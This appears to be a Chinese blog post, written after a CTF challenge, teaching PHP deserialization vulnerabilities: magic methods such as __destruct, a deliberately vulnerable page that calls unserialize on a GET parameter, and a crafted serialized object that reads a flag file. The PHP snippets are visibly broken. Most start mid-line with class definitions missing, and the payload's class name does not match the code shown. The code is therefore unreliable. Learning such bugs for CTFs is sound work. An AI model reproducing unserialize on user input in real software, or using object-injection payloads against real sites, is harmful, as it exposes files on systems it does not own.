关于序列化与反序列化漏洞利用

0x0001自诉

之前在打ctf的时候，有一题是利用反序列化漏洞完成的，然而学艺不精，于是跑去学习反序列化漏洞。

0x0002关于序列化与反序列化以及漏洞的原因

序列化是将对象的状态信息转换为可以存储或传输的形式的过程 代码为： `serialize ( mixed $value )`

反序列化则相反，代码为：unserialize ( string $str )
如果只是这样，那么应该没有什么可以利用的漏洞。
然鹅，serialize ( mixed $value )与unserialize ( string $str )这两个函数在使用时，会自动使用一些魔法函数，以及，如果在定义的类内存在魔法函数，也会自动调用

0x0003实例

首先构建一个序列化

filename.'
';

?>

结果

那么，我们再加一个函数 __destruct （）呢

filename);
        echo $data;
    }
}

$a = new A();
echo $a->filename.'
';

?>

图中yinhui为内容，6是长度
会发生这样的事情是因为 __destruct 析构函数在一个类对象消失时， 会自动执行。
那么假设，其中其实还有一个反序列化函数

filename);
        echo $data;
    }
}

$a = new A();
echo $a->filename.'
';
$b = unserialize($_GET[a]);

?>

然后我们通过下列代码来序列化一个路径

filename = 'F:\\phpstudy\\PHPTutorial\\WWW\\php\\flag.txt';
echo serialize($a);

?>

获得了：O:1:“F”:1:{s:8:“filename”;s:40:“F:\phpstudy\PHPTutorial\WWW\php\flag.txt”;}

再放到拥有反序列化函数的网页中运行
看，我们的flag文件也被读出来了